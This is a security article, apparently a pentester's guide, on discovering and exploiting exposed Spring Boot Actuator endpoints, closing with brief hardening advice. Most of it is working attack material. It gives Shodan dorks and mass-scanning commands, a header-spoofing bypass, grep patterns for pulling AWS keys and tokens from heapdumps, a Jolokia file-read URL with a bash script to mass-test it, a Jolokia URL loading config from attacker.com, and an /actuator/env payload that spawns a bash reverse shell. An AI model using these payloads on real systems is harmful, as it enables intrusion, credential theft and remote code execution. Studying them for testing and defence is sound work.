Spring Boot Actuator

Introduction

Spring Boot Actuator is a developer's best friend. It provides powerful, production-ready features for monitoring and managing applications with minimal effort. Through a series of HTTP endpoints, developers can check application health, view metrics, understand configurations and much more. However, when misconfigured and exposed to the public internet, this helpful tool can turn into a critical security vulnerability, offering a backdoor for attackers.

In this article I explore the methods used by security researchers and attackers to discover, enumerate and exploit these exposed actuator endpoints.

My testing begins with large-scale scanning and fingerprinting to locate Spring Boot instances and determine whether their Actuator management endpoints are exposed to the internet.

Using Search Engines like Shodan

Internet-wide scanners such as Shodan accelerate reconnaissance. I often fingerprint Spring Boot apps by matching the default favicon hash. You can use a dork like these in Shodan to find potential targets within a specific organization:

org:target_org http.favicon.hash:116323821

ssl:"example.com" http.favicon.hash:116323821

ssl.cert.subject.CN:"*.example.com" http.favicon.hash:116323821

hostname:"example.com" http.favicon.hash:116323821

ssl.cert.subject.CN:"example.com" http.favicon.hash:116323821

These query filters return hosts and organizations tied to the target that present the default Spring Boot favicon, giving me a quick initial target list.

Active Scanning and Wordlist-Based Fuzzing

Once I have a list of potential targets, the next step is to verify the presence of Actuator endpoints. To do this, I use a combination of tools to fuzz and probe for common paths.

Nuclei Scanner

Nuclei is a fast, template-based scanner that runs reusable YAML checks across multiple hosts in parallel.

cat act.txt | nuclei -tags actuator -c 50

cat act.txt | nuclei -tags jolokia -es info,low -silent

Dirsearch

A classic tool for discovering web content. Using a specialized wordlist like one from SecLists makes it highly effective.

dirsearch -l target.txt -w /Seclist/Discovery/Web-Content/spring-boot.txt -x 404 -o output.txt

Httpx-Toolkit

A fast, multi-purpose HTTP toolkit perfect for probing many hosts for specific endpoints.

cat targets.txt | httpx-toolkit -silent -threads 50 -path '/actuator,/actuator/health,/actuator/info' -mc 200,401,403,302 > actuators.txt

The scan filters for responses like 200, 401, and 403; any of these responses confirm the endpoint is reachable. An example of a found live endpoint looks like this:

Finding an endpoint is only step one. The real value is what the endpoint exposes. I focus on enumerating sensitive endpoints and testing common protections.

Key Sensitive Endpoints

In my assessments, I prioritize certain endpoints because of the high-impact data they can expose:

Bypassing Access Controls

Often, sensitive endpoints are protected by a WAF or a reverse proxy that restricts access to internal IPs. However, these protections can sometimes be bypassed by tricking the application into thinking the request is internal. This can be done by spoofing HTTP headers like X-Forwarded-For.

GET /actuator/env HTTP/1.1
Host: example.com
X-Forwarded-For: 127.0.0.1

Path-Based Bypass Patterns

Small URL tweaks can cause servers or proxies to respond differently, useful for bypass.

Once I gain access to a sensitive endpoint, the final step is to demonstrate the potential impact of the exposure.

Analyzing the Heapdump for Secrets

The /actuator/heapdump endpoint returns a gzipped binary file that can be a goldmine for credentials. The strings command combined with grepis a simple yet powerful way to sift through this data for known patterns, such as AWS keys which often start with “AKIA”.

# Download the heapdump first: wget http://target.com/actuator/heapdump

strings heapdump | grep -B 2 -A 2 "AKIA"

The -B (before) and -A (after) flags provide context around the key, which might reveal the corresponding secret key and demonstrate a critical data leak.

More Useful Regex Patterns

strings -a -n 6 heapdump | grep -Eo 'AKIA[0-9A-Z]{16}' | sort -u > aws_keys.txt

strings -a -n 10 heapdump | grep -Eo '[A-Za-z0-9\-_]+\.[A-Za-z0-9\-_]+\.[A-Za-z0-9\-_]+' | sort -u > jwt_candidates.txt

strings -a -n 10 heapdump | grep -Eo '[A-Za-z0-9_\-]{20,}' | sort -u > long_token_candidates.txt

strings -a -n 6 heapdump.hprof | grep -Ei 'password|passwd|pwd|secret|api[_-]?key|token|auth|authorization|bearer|aws|AKIA|ssh-rsa' -n > possible_secrets.txt

You can also analyze and monitor it using VisualVM to inspect memory usage, identify objects and detect sensitive data.

Leveraging Jolokia for RCE and LFI

From a security perspective, the /actuator/jolokia endpoint is one of the most critical. It exposes JMX MBeans, which can be used to interact with the underlying application server.

Local File Inclusion (LFI)

Certain MBeans can be abused to read files from the server's filesystem. This PoC uses the DiagnosticCommand MBean to read /etc/passwd.

http://domain.com/actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd

Note: The path /etc/passwd is encoded as !/etc!/passwd for the Jolokia exec payload.

Bash Script to Check for LFI

#!/bin/bash

while read ip; do
    echo "Testing: $ip"
    response=$(curl -s -m 10 "http://$ip/actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd")
    if echo "$response" | grep -q "root:"; then
        echo "VULNERABLE: $ip"
        echo "$response" > "vulnerable_$ip.txt"
    fi
done < ip_list.txt

Remote Code Execution (RCE)

A classic RCE vector through Jolokia involves the Logback JMXConfigurator. An attacker can instruct the application to reload its logging configuration from a malicious, attacker-controlled URL.

http://domain.com/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/attacker.com!/logback.xml

Alternative Approach: Reverse Shell

curl -X POST "http://ip/actuator/env" \
  -H "Content-Type: application/json" \
  -d '{
    "name":"spring.datasource.hikari.connection-test-query",
    "value":"CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException { Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", cmd}); return "done"; }'; CALL EXEC('bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1');"
  }'

Remember to start your listener first: nc -lvnp YOUR_PORT

To speed up these checks I often rely on open-source Burp Suite extensions that automate repetitive discovery and validation tasks.

Preventing this entire class of vulnerabilities comes down to following security best practices:

• 1Never expose actuators to the public internet. Place them behind a firewall and ensure they are only accessible from trusted internal networks.
• 2Use Spring Security to protect all actuator endpoints with robust authentication and authorization.
• 3Change the base path from /actuator to something non-standard via the management.endpoints.web.base-path property.
• 4Disable unused and sensitive endpoints. If you don't need /heapdump or /jolokia in production, turn them off completely.

By understanding how these endpoints are abused, developers and security teams can take proactive steps to ensure their applications remain secure.